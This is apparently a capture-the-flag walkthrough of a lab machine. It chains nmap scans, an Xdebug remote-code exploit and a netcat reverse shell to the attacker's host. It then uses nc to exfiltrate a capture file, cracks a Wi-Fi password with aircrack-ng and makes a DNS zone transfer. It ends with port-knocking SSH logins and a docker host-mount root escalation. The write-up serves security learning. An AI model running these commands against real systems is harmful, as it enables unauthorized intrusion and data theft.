nmap -p- --min-rate 5000 10.10.10.83 -Pn
Note: Port 22 is filtered, maybe, we can do Port Knocking to make open this port of target machine.
After detection of open ports, let's do greater nmap scan.
nmap -A -sC -sV -p53,80,2222 10.10.10.83 -Pn 
Let's look at web application.
While looking at HTTP response headers via curl command, I see Xdebug's version is 2.5.5
While I search publicly known exploit for this version of Xdebug, I find this exploit
python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.14.8
Let's write reverse shell payload into here as below.
system("nc -e /bin/bash 10.10.14.8 1337")
Hola! I got reverse shell from port 1337.
Let's enumerate this machine, I guess that it is container.
I find interesting .cap file from /home/zeus/airgeddon/captured directory, named as captured.cap file.
Let's download this into our box. I will use nc to download file. nc for file transfer.
First, I open listener as below
nc -l -p 1234 > captured.cap
Then, I send this file into my box as below.
nc -w 3 10.10.14.8 1234 < captured.cap
Let's look at this file via Wireshark. I can easily find SSID (Service Set IDentifier).
As we have ready and open .cap file and we know SSID, we can do Password Cracking for Wi-Fi password.
That's the first thing which I do , which is so interested for me.
aircrack-ng -e Too_cl0se_to_th3_Sun -w /usr/share/wordlists/rockyou.txt caputred.cap
From notes file and password itself, I guess that username is icarus, let's join into machine via this credentials by using ssh via port 2222.
icarus: Too_cl0se_to_th3_Sun
ssh icarus@10.10.10.83 -p 2222
From .txt file, I can see new domain records ctfolympus.htb, let's dig this domain via AXFR protocol to find subdomains.
dig axfr @10.10.10.83 ctfolympus.htb
From records itself, you can see one TXT record which says 3 numbers and looks like sequence for /etc/knockd.conf file.
Also from this TXT record, we can grab username as "prometheus" and password as "St34l_th3_F1re!".
Let's do Port Knocking via knock command as below.
knock -v 10.10.10.83 3456:TCP 8234:TCP 62431:TCP
Now, as port 22 (ssh) is open, we can test our credentials via ssh command.
prometheus: St34l_th3_F1re!
But after Port Knocking, port 22 is filtered again, that's why we need to run one cmdlet as below.
knock -v 10.10.10.83 3456:TCP 8234:TCP 62431:TCP && ssh prometheus@10.10.10.83user.txt
For Privilege Escalation, I just run id command to see included groups of this user.
While I run docker ps to see local images, I see the result as below.
Let's exploit to get root info via docker run.
docker run -v /:/hostOS -i -t rodhes bashroot.txt
